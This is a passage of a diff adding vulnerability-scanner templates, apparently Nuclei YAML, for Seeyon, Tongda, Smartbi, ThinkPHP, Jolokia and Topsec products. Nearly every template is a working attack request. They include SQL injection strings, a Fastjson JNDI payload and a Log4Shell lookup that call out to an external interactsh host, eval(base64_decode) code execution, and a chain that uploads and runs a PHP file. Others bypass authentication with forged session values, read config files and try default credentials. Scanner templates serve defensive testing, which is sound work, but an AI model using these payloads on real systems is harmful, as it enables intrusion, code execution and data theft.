Content-Type: application/x-www-form-urlencoded
matchers-condition: and
matchers:
- type: word
words:
- "personList"
- type: word
words:
- "personHash.Add"
- type: status
status:
- 200
# Enhanced by cs on 2022/07/05

29
http/vulnerabilities/seeyon/seeyon-oa-a6-setextno-sqli.yaml Executable file
View File

@ -0,0 +1,29 @@
id: seeyon-oa-a6-setextno-sqli
info:
name: seeyon-oa a6 setextno sqli
author: SleepingBag945
severity: high
description: 致远OA A6 setextno.jsp SQL注入漏洞
reference:
- https://github.com/achuna33/MYExploit/blob/8ffbf7ee60cbd77ad90b0831b93846aba224ab29/src/main/java/com/achuna33/Controllers/SeeyonController.java
- http://wiki.peiqi.tech/wiki/oa/致远OA/致远OA%20A6%20setextno.jsp%20SQL注入漏洞.html
tags: seeyon,oa
http:
- raw:
- |
GET /yyoa/ext/trafaxserver/ExtnoManage/setextno.jsp HTTP/1.1
Host: {{Hostname}}
Content-Type: application/x-www-form-urlencoded
matchers-condition: and
matchers:
- type: word
words:
- "请填写以下用户的传真分机号"
- type: status
status:
- 200
# /yyoa/ext/trafaxserver/ExtnoManage/setextno.jsp?user_ids=(99999) union all select 1,2,(md5(1)),4#

32
http/vulnerabilities/seeyon/seeyon-oa-a8-default-login.yaml Executable file
View File

@ -0,0 +1,32 @@
id: seeyon-oa-a8-default-login
info:
name: seeyon-oa A8 default login
author: SleepingBag945
severity: high
description: 致远(seeyon)OA A8+企业版存在弱口令漏洞,可利用该漏洞登陆后台
tags: seeyon,oa
http:
- raw:
- |
POST /seeyon/rest/authentication/ucpcLogin HTTP/1.1
Host: {{Hostname}}
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/71.0.3578.98 Safari/537.36
Content-Length: 75
Accept: */*
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip
UserAgentFrom=iphone&login_username=audit-admin&login_password=seeyon123456
matchers-condition: and
matchers:
- type: word
words:
- "\"LoginOK\":\"ok\""
- type: status
status:
- 200
# Enhanced by cs on 2022/07/05

44
http/vulnerabilities/seeyon/seeyon-oa-a8-m-information-disclosure.yaml Executable file
View File

@ -0,0 +1,44 @@
id: seeyon-oa-a8-m-information-disclosure
info:
name: seeyon-oa-m a8 information-disclosure
author: SleepingBag945
severity: medium
description: 致远OA A8-m 存在状态监控页面信息泄露,攻击者可以从其中获取网站路径和用户名等敏感信息进一步攻击,攻击者利用此漏洞可直接进入应用系统或者管理系统,从而进行系统、网页、数据的篡改与删除,非法获取系统、用户的数据,甚至可能导致服务器沦陷。
reference:
- http://wiki.peiqi.tech/wiki/oa/%E8%87%B4%E8%BF%9COA/%E8%87%B4%E8%BF%9COA%20A8%20status.jsp%20%E4%BF%A1%E6%81%AF%E6%B3%84%E9%9C%B2%E6%BC%8F%E6%B4%9E.html
tags: seeyon,oa
http:
- raw:
- |
POST /seeyon/management/index.jsp HTTP/1.1
Host: {{Hostname}}
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/71.0.3578.98 Safari/537.36
Accept: */*
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip
password=WLCCYBD%40SEEYON
matchers-condition: and
matchers:
- type: word
part: header
words:
- "/seeyon/management/status.jsp"
- type: word
part: header
words:
- "Set-Cookie"
- type: status
status:
- 302
# Enhanced by cs on 2022/07/05
# 登录后通过如下url访问敏感信息
# /seeyon/management/status.jsp
# /seeyon/logs/login.log
# /seeyon/logs/v3x.log

28
http/vulnerabilities/seeyon/seeyon-oa-fastjson-rce.yaml Executable file
View File

@ -0,0 +1,28 @@
id: seeyon-oa-fastjson-rce
info:
name: seeyon-oa fastjson rce
author: SleepingBag945
severity: critical
description: 致远OA Fastjson 远程代码执行
reference:
- https://github.com/achuna33/MYExploit/blob/8ffbf7ee60cbd77ad90b0831b93846aba224ab29/src/main/java/com/achuna33/Controllers/SeeyonController.java
tags: seeyon,oa,rce,fastjson
http:
- raw:
- |
POST /seeyon/main.do?method=changeLocale HTTP/1.1
Host: {{Hostname}}
Content-Type: application/x-www-form-urlencoded
_json_params={"v47":{"@type":"java.lang.Class","val":"com.sun.rowset.JdbcRowSetImpl"},"xxx":{"@type":"com.sun.rowset.JdbcRowSetImpl","dataSourceName":"ldap://{{interactsh-url}}","autoCommit":true}}
matchers-condition: and
matchers:
- type: word
part: interactsh_protocol
words:
- "dns"
# Enhanced by cs on 2022/07/05

28
http/vulnerabilities/seeyon/seeyon-oa-log4jshell.yaml Executable file
View File

@ -0,0 +1,28 @@
id: seeyon-oa-log4jshell
info:
name: seeyon-oa log4jshell
author: SleepingBag945
severity: critical
description: 致远OA Log4jShell
reference:
- https://github.com/achuna33/MYExploit/blob/8ffbf7ee60cbd77ad90b0831b93846aba224ab29/src/main/java/com/achuna33/Controllers/SeeyonController.java
tags: seeyon,oa,rce
http:
- raw:
- |
POST /seeyon/main.do?method=login HTTP/1.1
Host: {{Hostname}}
Content-Type: application/x-www-form-urlencoded
authorization=&login.timezone=GMT+8:00&province=&city=&rectangle=&login_username=${${::-j}${::-n}${::-d}${::-i}:${::-l}${::-d}${::-a}${::-p}://{{interactsh-url}}}
matchers-condition: and
matchers:
- type: word
part: interactsh_protocol
words:
- "dns"
# Enhanced by cs on 2022/07/05

29
http/vulnerabilities/seeyon/seeyon-oa-sp2-wpsAssistServlet-arbitrary-file-upload.yaml Executable file
View File

@ -0,0 +1,29 @@
id: seeyon-oa-sp2-wpsAssistServlet-arbitrary-file-upload
info:
name: seeyon-oa sp2 wpsAssistServlet arbitrary file upload
author: SleepingBag945
severity: critical
description: 致远OA SP2 wpsAssistServlet 任意文件上传
reference:
- https://github.com/achuna33/MYExploit/blob/8ffbf7ee60cbd77ad90b0831b93846aba224ab29/src/main/java/com/achuna33/Controllers/SeeyonController.java
- http://wiki.peiqi.tech/wiki/oa/致远OA/致远OA%20wpsAssistServlet%20任意文件上传漏洞.html
tags: seeyon,oa
http:
- raw:
- |
GET /seeyon/wpsAssistServlet HTTP/1.1
Host: {{Hostname}}
Content-Type: application/x-www-form-urlencoded
matchers-condition: and
matchers:
- type: word
words:
- "\"data\":\"flag is empty\""
- type: status
status:
- 200
# Enhanced by cs on 2022/07/05

26
http/vulnerabilities/shiziyu-cms/shiziyu-cms-apicontroller-sqli.yaml Executable file
View File

@ -0,0 +1,26 @@
id: shiziyu-cms-apicontroller-sqli
info:
name: shiziyu-cms-apicontroller-sqli
author: SleepingBag945
severity: high
description: |
狮子鱼CMS ApiController.class.php 参数过滤存在不严谨导致SQL注入漏洞
metadata:
fofa-query: body="/seller.php?s=/Public/login"
tags: sqli
http:
- raw:
- |
GET /index.php?s=api/goods_detail&goods_id=1%20and%20updatexml(1,concat(0x7e,md5(1),0x7e),1) HTTP/1.1
Host: {{Hostname}}
User-Agent: Mozilla/5.0(X11; Linux x86_64; rv:12.0) Gecko/20100101 Firefox/12.0
matchers:
- type: dsl
dsl:
- 'status_code_1 == 404 && contains(body_1,"c4ca4238a0b923820dcc509a6f75849") && contains(body_1,"syntax error")'
condition: and

33
http/vulnerabilities/smartbi/smartbi-default-user.yaml Executable file
View File

@ -0,0 +1,33 @@
id: smartbi-default-user
info:
name: smartbi - Default user weakpass
author: unknown
severity: high
description: |
Smartbi default user weakpass.
reference:
- https://mp.weixin.qq.com/s?__biz=MzIwMDk1MjMyMg==&mid=2247491565&idx=1&sn=eb2af62a72167c6f82ae8ec3db878511
tags: smartbi
http:
- raw:
- |
POST /smartbi/vision/RMIServlet HTTP/1.1
Host: {{Hostname}}
Content-Type: application/x-www-form-urlencoded
Content-Length: 67
className=UserService&methodName=loginFromDB&params=["system","0a"]
- |
POST /vision/RMIServlet HTTP/1.1
Host: {{Hostname}}
Content-Type: application/x-www-form-urlencoded
Content-Length: 67
className=UserService&methodName=loginFromDB&params=["system","0a"]
matchers:
- type: word
words:
- '"result":true'
part: body

31
http/vulnerabilities/smartbi/smartbi-windowunloading-deserialization.yaml Executable file
View File

@ -0,0 +1,31 @@
id: smartbi-windowunloading-deserialization
info:
name: smartbi - Deserialization vulnerability in the windowunloading interface
author: unknown
severity: critical
description: |
Smartbi Deserialization vulnerability in the windowunloading interface.
reference:
- https://stack.chaitin.com/techblog/detail?id=122
tags: smartbi
http:
- raw:
- |
POST /vision/RMIServlet?windowUnloading=%7a%44%70%34%57%70%34%67%52%69%70%2b%69%49%70%69%47%5a%70%34%44%52%77%36%2b%2f%4a%56%2f%75%75%75%37%75%4e%66%37%4e%66%4e%31%2f%75%37%31%27%2f%4e%4f%4a%4d%2f%4e%4f%4a%4e%2f%75%75%2f%4a%54 HTTP/1.1
Host: {{Hostname}}
Content-Type: application/x-www-form-urlencoded
className=UserService&methodName=isLogged&params=[]
- |
POST /smartbi/vision/RMIServlet?windowUnloading=%7a%44%70%34%57%70%34%67%52%69%70%2b%69%49%70%69%47%5a%70%34%44%52%77%36%2b%2f%4a%56%2f%75%75%75%37%75%4e%66%37%4e%66%4e%31%2f%75%37%31%27%2f%4e%4f%4a%4d%2f%4e%4f%4a%4e%2f%75%75%2f%4a%54 HTTP/1.1
Host: {{Hostname}}
Content-Type: application/x-www-form-urlencoded
className=UserService&methodName=isLogged&params=[]
matchers:
- type: word
words:
- 'H~CxOm~'
part: body

33
http/vulnerabilities/spring/jolokia-logback-jndi-rce.yaml Executable file
View File

@ -0,0 +1,33 @@
id: jolokia-logback-jndi-rce
info:
name: jolokia-logback-jndi-rce
author: SleepingBag945
severity: high
reference:
- https://thinkloveshare.com/hacking/ssrf_to_rce_with_jolokia_and_mbeans/
- https://github.com/laluka/jolokia-exploitation-toolkit
- https://github.com/LandGrey/SpringBootVulExploit#0x04jolokia-logback-jndi-rce
tags: jolokia,springboot,tomcat
http:
- method: GET
path:
- "{{BaseURL}}/jolokia/list"
- "{{BaseURL}}/actuator/jolokia/list"
stop-at-first-match: true
matchers-condition: and
matchers:
- type: status
status:
- 200
- type: word
part: body
words:
- 'ch.qos.logback.classic.jmx.JMXConfigurator'
- type: word
part: body
words:
- 'reloadByURL'

33
http/vulnerabilities/spring/jolokia-realm-jndi-rce.yaml Executable file
View File

@ -0,0 +1,33 @@
id: jolokia-realm-jndi-rce
info:
name: jolokia Realm JNDI RCE
author: SleepingBag945
severity: high
reference:
- https://thinkloveshare.com/hacking/ssrf_to_rce_with_jolokia_and_mbeans/
- https://github.com/laluka/jolokia-exploitation-toolkit
- https://github.com/LandGrey/SpringBootVulExploit#0x05jolokia-realm-jndi-rce
tags: jolokia,springboot,tomcat
http:
- method: GET
path:
- "{{BaseURL}}/jolokia/list"
- "{{BaseURL}}/actuator/jolokia/list"
stop-at-first-match: true
matchers-condition: and
matchers:
- type: status
status:
- 200
- type: word
part: body
words:
- 'type=MBeanFactory'
- type: word
part: body
words:
- 'createJNDIRealm'

49
http/vulnerabilities/spring/springboot-env-all-check.yaml Executable file
View File

@ -0,0 +1,49 @@
id: springboot-env-all-check
info:
name: Springboot Env Actuator - Detect
author: that_juan_,dwisiswant0,wdahlenb,philippedelteil,stupidfish,SleepingBag945
severity: high
description: Sensitive environment variables may not be masked
tags: misconfig,springboot,env,exposure
http:
- method: GET
path:
- "{{BaseURL}}/env"
- "{{BaseURL}}/actuator/env"
- "{{BaseURL}}/1/..;/env"
- "{{BaseURL}}/1/..;/actuator/env"
- "{{BaseURL}}/actuator;/env;"
- "{{BaseURL}}/message-api/actuator/env"
stop-at-first-match: true
matchers-condition: and
matchers:
- type: word
part: body
words:
- "applicationConfig"
- "activeProfiles"
condition: or
- type: word
part: body
words:
- "server.port"
- "local.server.port"
condition: or
- type: word
part: header
words:
- "application/json"
- "application/vnd.spring-boot.actuator"
- "application/vnd.spring-boot.actuator.v1+json"
- "application/vnd.spring-boot.actuator.v2+json"
- "application/vnd.spring-boot.actuator.v3+json"
condition: or
- type: status
status:
- 200

35
http/vulnerabilities/thinkphp/thinkphp6-lang-lfi.yaml Executable file
View File

@ -0,0 +1,35 @@
id: thinkphp6-lang-lfi
info:
name: Thinkphp Lang - LFI
author: kagamigawa
severity: high
description: |
Thinkphp,v6.0.1~v6.0.13, v5.0.x~v5.1.41, v5.0.0~v5.0.24 vulnerable to LFI.可RCE
reference:
- https://tttang.com/archive/1865/
metadata:
verified: true
shodan-query: title:"Thinkphp"
fofa-query: header="think_lang"
tags: thinkphp,lfi
http:
- method: GET
path:
- "{{BaseURL}}/?lang=../../thinkphp/base"
- "{{BaseURL}}/?lang=../../../../../vendor/topthink/think-trace/src/TraceDebug"
stop-at-first-match: true
matchers-condition: and
matchers:
- type: word
part: body
words:
- 'Call Stack'
- 'class="trace'
condition: and
- type: status
status:
- 500

45
http/vulnerabilities/tongda/tongda-oa-api-ali-arbitrary-file-upload.yaml Executable file
View File

@ -0,0 +1,45 @@
id: tongda-oa-api-ali-arbitrary-file-upload
info:
name: tongda-oa-api-ali-arbitrary-file-upload
author: SleepingBag945
severity: critical
description: 通达OA v11.8 api.ali.php 存在任意文件上传漏洞,攻击者通过漏可以上传恶意文件控制服务器
reference:
- http://wiki.peiqi.tech/wiki/oa/通达OA/通达OA%20v11.8%20api.ali.php%20任意文件上传漏洞.html
tags: tongda,oa
http:
- raw:
- |
POST /mobile/api/api.ali.php HTTP/1.1
Host: {{Hostname}}
Content-Type: multipart/form-data; boundary=502f67681799b07e5de6b503655f5cae
Accept-Encoding: gzip
--502f67681799b07e5de6b503655f5cae
Content-Disposition: form-data; name="file"; filename="fb6790f4.json"
Content-Type: application/octet-stream
{"modular":"AllVariable","a":"ZmlsZV9wdXRfY29udGVudHMoJy4uLy4uL2ZiNjc5MGY0LnBocCcsJzw/cGhwIHBocGluZm8oKTs/PicpOw==","dataAnalysis":"{"a":"錦',$BackData[dataAnalysis] => eval(base64_decode($BackData[a])));/*"}"}
--502f67681799b07e5de6b503655f5cae--
- |
GET /inc/package/work.php?id=../../../../../myoa/attach/approve_center/{{trim_prefix(date_time("%Y%M", unix_time()),"20")}}/%3E%3E%3E%3E%3E%3E%3E%3E%3E%3E%3E.fb6790f4 HTTP/1.1
Host: {{Hostname}}
Content-Type: application/x-www-form-urlencoded
- |
GET /fb6790f4.php HTTP/1.1
Host: {{Hostname}}
Content-Type: application/x-www-form-urlencoded
# req-condition: true
matchers:
- type: dsl
dsl:
- 'status_code_1 == 200'
- 'status_code_2 == 200 && contains(body_2,"OK")'
- 'status_code_3 == 200 && contains(body_3,"phpinfo")'
condition: and

26
http/vulnerabilities/tongda/tongda-oa-getdata-rce.yaml Executable file
View File

@ -0,0 +1,26 @@
id: tongda-oa-getdata-rce
info:
name: tongda-oa-getdata-rce
author: SleepingBag945
severity: critical
description: 通达OA v11.9 getdata接口存在任意命令执行漏洞攻击者通过漏洞可以执行服务器任意命令控制服务器权限
reference:
- http://wiki.peiqi.tech/wiki/oa/通达OA/通达OA%20v11.9%20getdata%20任意命令执行漏洞.html
tags: tongda,oa,rce
http:
- raw:
- |
GET /general/appbuilder/web/portal/gateway/getdata?activeTab=%E5%27%19,1%3D%3Eeval(base64_decode(%22ZWNobyBqb2R3YWhmb2lhd2ppZm93YWR3Ow==%22)))%3B/*&id=19&module=Carouselimage HTTP/1.1
Host: {{Hostname}}
matchers-condition: and
matchers:
- type: word
words:
- "jodwahfoiawjifowadw"
- type: status
status:
- 200

36
http/vulnerabilities/tongda/tongda-oa-getway-remote-file-include-mysql.yaml Executable file
View File

@ -0,0 +1,36 @@
id: tongda-oa-getway-remote-file-include-mysql
info:
name: tongda-oa-getway-remote-file-include-mysql
author: SleepingBag945
severity: critical
description: 通达OA v11.8 getway.php 存在文件包含漏洞,攻击者通过发送恶意请求包含日志文件导致任意文件写入漏洞,利用未授权的文件上传配合任意本地文件包含,攻击者可以轻易的取得 shell 获得系统权限。
reference:
- http://wiki.peiqi.tech/wiki/oa/通达OA/通达OA%20v11.8%20getway.php%20远程文件包含漏洞.html
tags: tongda,oa
http:
- raw:
- |
POST /mac/gateway.php HTTP/1.1
Host: {{Hostname}}
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/71.0.3578.98 Safari/537.36
Accept: */*
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip
json={"url":"/general/../../mysql5/my.ini"}
matchers-condition: and
matchers:
- type: word
words:
- "[mysql]"
- type: word
words:
- "default-character-set"
- type: status
status:
- 200

31
http/vulnerabilities/tongda/tongda-oa-getway-remote-file-include.yaml Executable file
View File

@ -0,0 +1,31 @@
id: tongda-oa-getway-remote-file-include
info:
name: tongda-oa-getway-remote-file-include
author: SleepingBag945
severity: critical
description: 通达OA v11.8 getway.php 存在文件包含漏洞,攻击者通过发送恶意请求包含日志文件导致任意文件写入漏洞
reference:
- http://wiki.peiqi.tech/wiki/oa/通达OA/通达OA%20v11.8%20getway.php%20远程文件包含漏洞.html
tags: tongda,oa
http:
- raw:
- |
POST /ispirit/interface/gateway.php HTTP/1.1
Host: {{Hostname}}
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip
json={"url":"/general/../../nginx/logs/oa.access.log"}
matchers-condition: and
matchers:
- type: word
words:
- "ERROR URL"
- type: status
status:
- 200

44
http/vulnerabilities/tongda/tongda-oa-header-inc-arbitrary-login.yaml Executable file
View File

@ -0,0 +1,44 @@
id: tongda-oa-header-inc-arbitrary-login
info:
name: tongda-oa-header-inc-arbitrary-login
author: SleepingBag945
severity: high
description: 通达OA是一款OA系统。其旧版本的 header.inc.php 存在认证绕过漏洞,攻击者可构造恶意请求访问 header.inc.php获取cookie后通过身份认证登录后台执行相关敏感操作造成敏感信息泄漏等等。
reference:
- https://github.com/Phuong39/2022-HW-POC/blob/main/%E9%80%9A%E8%BE%BEOA%E7%99%BB%E5%BD%95%E8%AE%A4%E8%AF%81%E7%BB%95%E8%BF%87.md
tags: tongda,oa
http:
- raw:
- |
POST /module/retrieve_pwd/header.inc.php HTTP/1.1
Host: {{Hostname}}
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/71.0.3578.98 Safari/537.36
Accept: */*
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip
_SESSION[LOGIN_THEME]=15&_SESSION[LOGIN_USER_ID]=1&_SESSION[LOGIN_UID]=1&_SESSION[LOGIN_FUNC_STR]=1,3,42,643,644,634,4,147,148,7,8,9,10,16,11,130,5,131,132,256,229,182,183,194,637,134,37,135,136,226,253,254,255,536,24,196,105,119,80,96,97,98,114,126,179,607,539,251,127,238,128,85,86,87,88,89,137,138,222,90,91,92,152,93,94,95,118,237,108,109,110,112,51,53,54,153,217,150,239,240,218,219,43,17,18,19,15,36,70,76,77,115,116,185,235,535,59,133,64,257,2,74,12,68,66,67,13,14,40,41,44,75,27,60,61,481,482,483,484,485,486,487,488,489,490,491,492,120,494,495,496,497,498,499,500,501,502,503,505,504,26,506,507,508,515,537,122,123,124,628,125,630,631,632,633,55,514,509,29,28,129,510,511,224,39,512,513,252,230,231,232,629,233,234,461,462,463,464,465,466,467,468,469,470,471,472,473,474,475,200,202,201,203,204,205,206,207,208,209,65,187,186,188,189,190,191,606,192,193,221,550,551,73,62,63,34,532,548,640,641,642,549,601,600,602,603,604,46,21,22,227,56,30,31,33,32,605,57,609,103,146,107,197,228,58,538,151,6,534,69,71,72,223,639,225,236,78,178,104,121,149,84,99,100,533,101,113,198,540,626,638,38,&_SESSION[LOGIN_USER_PRIV]=1&_SESSION[LOGIN_USER_PRIV_OTHER]=1&_SESSION[LOGIN_USER_PRIV_TYPE]=1&_SESSION[LOGIN_NOT_VIEW_USER]=0&_SESSION[RETRIEVE_PWD_USER]=1
- |
GET /general/index.php HTTP/1.1
Host: {{Hostname}}
Cookie: PHPSESSID={{cookie}};
extractors:
- type: regex
name: cookie
internal: true
part: header
group: 1
regex:
- 'PHPSESSID=(.*?);'
req-condition: true
matchers:
- type: dsl
dsl:
- 'status_code_1 == 200 && contains(header_1, "Set-Cookie") && contains(header_1,"PHPSESSID")'
- 'status_code_2 == 200 && !contains(body_2,"<title>用户未登录</title>") && contains(body_2,"loginUser")'
condition: and

33
http/vulnerabilities/tongda/tongda-oa-insert-sqli.yaml Executable file
View File

@ -0,0 +1,33 @@
id: tongda-oa-insert-sqli
info:
name: tongda-oa-insert-sqli
author: SleepingBag945
severity: high
description: 通达OA v11.6 insert参数包含SQL注入漏洞攻击者通过漏洞可获取数据库敏感信息
reference:
- http://wiki.peiqi.tech/wiki/oa/通达OA/通达OA%20v11.6%20insert%20SQL注入漏洞.html
tags: tongda,oa,info
http:
- raw:
- |
POST /general/document/index.php/recv/register/insert HTTP/1.1
Host: {{Hostname}}
Content-Type: application/x-www-form-urlencoded
title)values("'"^exp(if(ascii(substr(MOD(5,2),1,1))<128,1,710)))# =1&_SERVER=
matchers-condition: and
matchers:
- type: word
part: header
words:
- "PHPSESSID="
- type: status
status:
- 302
#exp title)values("'"^exp(if(ascii(substr((select/**/SID/**/from/**/user_online/**/limit/**/0,1),8,1))<66,1,710)))# =1&_SERVER=

52
http/vulnerabilities/tongda/tongda-oa-login-code-arbitrary-login.yaml Executable file
View File

@ -0,0 +1,52 @@
id: tongda-oa-login-code-arbitrary-login
info:
name: tongda-oa-login-code-arbitrary-login
author: SleepingBag945
severity: high
description: 通达OA是一套办公系统。2020年04月17日, 通达OA官方在更新了一个v11版本安全补丁, 其中修复了一个任意用户伪造登录漏洞。 该漏洞类型为任意用户伪造,未经授权的远程攻击者可以通过精心构造的请求包进行任意用户伪造登录.登录之后可进一步上传恶意文件控制网站服务器。
reference:
- http://wiki.peiqi.tech/wiki/oa/通达OA/通达OA%20v11.5%20login_code.php%20任意用户登录.html
tags: tongda,oa
http:
- raw:
- |
GET /general/login_code.php HTTP/1.1
Host: {{Hostname}}
- |
POST /logincheck_code.php HTTP/1.1
Host: {{Hostname}}
CODEUID={{uid}}&UID=1
- |
GET /general/index.php?isIE=0&modify_pwd=0 HTTP/1.1
Host: {{Hostname}}
Cookie: PHPSESSID={{cookie}};
extractors:
- type: regex
name: uid
internal: true
group: 1
regex:
- '"code_uid":"(.*?)"'
- type: regex
name: cookie
internal: true
part: header
group: 1
regex:
- 'PHPSESSID=(.*?);'
req-condition: true
matchers:
- type: dsl
dsl:
- 'status_code_1 == 200 && contains(body_1, "\"code_uid\":\"{") && contains(body_1,"\"status\":1")'
- 'status_code_2 == 200 && contains(body_2,"index.php?isIE")'
- 'status_code_2 == 200 && contains(header_2,"Set-Cookie")'
- 'status_code_3 == 200 && !contains(body_3,"<title>用户未登录</title>") && contains(body_3,"loginUser")'
condition: and

37
http/vulnerabilities/tongda/tongda-oa-meeting-unauth.yaml Executable file
View File

@ -0,0 +1,37 @@
id: tongda-oa-meeting-unauth
info:
name: tongda-oa-meeting-unauth
author: SleepingBag945
severity: medium
description: 通达OA v11.8 getway.php 存在文件包含漏洞,攻击者通过发送恶意请求包含日志文件导致任意文件写入漏洞
reference:
- http://wiki.peiqi.tech/wiki/oa/通达OA/通达OA%20v11.8%20getway.php%20远程文件包含漏洞.html
tags: tongda,oa
http:
- raw:
- |
GET /general/calendar/arrange/get_cal_list.php?starttime=1548058874&endtime=33165447106&view=agendaDay HTTP/1.1
Host: {{Hostname}}
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/62.0.3202.9 Safari/537.36
Accept: */*
Accept-Encoding: deflate
matchers-condition: and
matchers:
- type: word
words:
- "creator"
- type: word
words:
- "originalTitle"
- type: word
part: header
words:
- "application/json"
- type: status
status:
- 200

28
http/vulnerabilities/tongda/tongda-oa-report-bi-func-sqli.yaml Executable file
View File

@ -0,0 +1,28 @@
id: tongda-oa-report-bi-func-sqli
info:
name: tongda-oa-report-bi-func-sqli
author: SleepingBag945
severity: high
description: 通达OA v11.6 report_bi.func.php 存在SQL注入漏洞攻击者通过漏洞可以获取数据库信息
reference:
- http://wiki.peiqi.tech/wiki/oa/通达OA/通达OA%20v11.6%20report_bi.func.php%20SQL注入漏洞.html
tags: tongda,oa,info
http:
- raw:
- |
POST /general/bi_design/appcenter/report_bi.func.php HTTP/1.1
Host: {{Hostname}}
Content-Type: application/x-www-form-urlencoded
_POST[dataset_id]=efgh%27-%40%60%27%60%29union+select+database%28%29%2C2%2Cuser%28%29%23%27&action=get_link_info&
matchers-condition: and
matchers:
- type: word
words:
- "root@"
- type: status
status:
- 200

50
http/vulnerabilities/tongda/tongda-oa-swfupload-sqli.yaml Executable file
View File

@ -0,0 +1,50 @@
id: tongda-oa-swfupload-sqli
info:
name: tongda-oa-swfupload-sqli
author: SleepingBag945
severity: high
description: 通达OA v11.5 swfupload_new.php 文件存在SQL注入漏洞攻击者通过漏洞可获取服务器敏感信息
reference:
- http://wiki.peiqi.tech/wiki/oa/通达OA/通达OA%20v11.5%20swfupload_new.php%20SQL注入漏洞.html
tags: tongda,oa,info
http:
- raw:
- |
POST /general/file_folder/swfupload_new.php HTTP/1.1
Host: {{Hostname}}
Content-Type: multipart/form-data; boundary=----------GFioQpMK0vv2
Accept-Encoding: gzip
------------GFioQpMK0vv2
Content-Disposition: form-data; name="ATTACHMENT_ID"
1
------------GFioQpMK0vv2
Content-Disposition: form-data; name="ATTACHMENT_NAME"
1
------------GFioQpMK0vv2
Content-Disposition: form-data; name="FILE_SORT"
2
------------GFioQpMK0vv2
Content-Disposition: form-data; name="SORT_ID"
------------GFioQpMK0vv2--
matchers-condition: and
matchers:
- type: word
words:
- "不安全的SQL语句"
- type: status
status:
- 200
#Content-Disposition: form-data; name="SORT_ID"
#0 RLIKE (SELECT (CASE WHEN (1=1) THEN 1 ELSE 0x28 END))

35
http/vulnerabilities/tongda/tongda-oa-v2014-get-contactlist-info-leak.yaml Executable file
View File

@ -0,0 +1,35 @@
id: tongda-oa-v2014-get-contactlist-info-leak
info:
name: tongda-oa-v2014-get-contactlist-info-leak
author: SleepingBag945
severity: medium
description: 通达OA v2014 get_contactlist.php文件存在信息泄漏漏洞攻击者通过漏洞可以获取敏感信息进一步攻击
reference:
- http://wiki.peiqi.tech/wiki/oa/通达OA/通达OA%20v2014%20get_contactlist.php%20敏感信息泄漏漏洞.html
tags: tongda,oa,info
http:
- raw:
- |
GET /mobile/inc/get_contactlist.php?P=1&KWORD=%25&isuser_info=3 HTTP/1.1
Host: {{Hostname}}
matchers-condition: and
matchers:
- type: word
words:
- "user_uid"
- type: word
words:
- "user_name"
- type: word
words:
- "user_id"
- type: word
words:
- "priv_name"
- type: status
status:
- 200

61
http/vulnerabilities/tongda/tongda-oa-v2017-action-upload-arbitrary-file-upload.yaml Executable file
View File

@ -0,0 +1,61 @@
id: tongda-oa-v2017-action-upload-arbitrary-file-upload
info:
name: tongda-oa-v2017-action-upload-arbitrary-file-upload
author: SleepingBag945
severity: critical
description: 通达OA v2017 action_upload.php 文件过滤不足且无需后台权限,导致任意文件上传漏洞
reference:
- http://wiki.peiqi.tech/wiki/oa/通达OA/通达OA%20v2017%20video_file.php%20任意文件下载漏洞.html
tags: tongda,oa,info
http:
- raw:
- |
POST /module/ueditor/php/action_upload.php?action=uploadfile HTTP/1.1
Host: {{Hostname}}
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/71.0.3578.98 Safari/537.36
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryjhddzlqp
X_requested_with: XMLHttpRequest
Accept-Encoding: gzip
------WebKitFormBoundaryjhddzlqp
Content-Disposition: form-data; name="CONFIG[fileFieldName]"
ffff
------WebKitFormBoundaryjhddzlqp
Content-Disposition: form-data; name="CONFIG[fileMaxSize]"
1000000000
------WebKitFormBoundaryjhddzlqp
Content-Disposition: form-data; name="CONFIG[filePathFormat]"
{{randstr_1}}
------WebKitFormBoundaryjhddzlqp
Content-Disposition: form-data; name="CONFIG[fileAllowFiles][]"
.php
------WebKitFormBoundaryjhddzlqp
Content-Disposition: form-data; name="ffff"; filename="test.php"
Content-Type: application/octet-stream
<?php echo md5(40167);unlink(__FILE__);?>
------WebKitFormBoundaryjhddzlqp
Content-Disposition: form-data; name="mufile"
submit
------WebKitFormBoundaryjhddzlqp--
- raw:
- |
GET {{randstr_1}}.php HTTP/1.1
Host: {{Hostname}}
matchers-condition: and
matchers:
- type: word
words:
- "1f18933ca1e531c1eac9cccc4952a03b"
- type: status
status:
- 200

29
http/vulnerabilities/tongda/tongda-oa-v2017-video-file-arbitrary-file-read.yaml Executable file
View File

@ -0,0 +1,29 @@
id: tongda-oa-v2017-video-file-arbitrary-file-read
info:
name: tongda-oa-v2017-video-file-arbitrary-file-read
author: SleepingBag945
severity: medium
description: 通达OA v2017 video_file.php文件存在任意文件下载漏洞攻击者通过漏洞可以读取服务器敏感文件
reference:
- http://wiki.peiqi.tech/wiki/oa/通达OA/通达OA%20v2017%20video_file.php%20任意文件下载漏洞.html
tags: tongda,oa,info
http:
- raw:
- |
GET /general/mytable/intel_view/video_file.php?MEDIA_DIR=../../../inc/&MEDIA_NAME=oa_config.php HTTP/1.1
Host: {{Hostname}}
matchers-condition: and
matchers:
- type: word
words:
- "$ROOT_PATH"
- type: word
words:
- "$ATTACH_PATH"
- type: status
status:
- 200

36
http/vulnerabilities/topsec/topsec-topacm-rce.yaml Executable file
View File

@ -0,0 +1,36 @@
id: topsec-topacm-rce
info:
name: topsec topacm remote code execution
author: SleepingBag945
severity: critical
description: 天融信 上网行为管理系统 static_convert.php 远程命令执行漏洞
reference:
- https://github.com/achuna33/MYExploit/blob/8ffbf7ee60cbd77ad90b0831b93846aba224ab29/src/main/java/com/achuna33/Controllers/TRXController.java
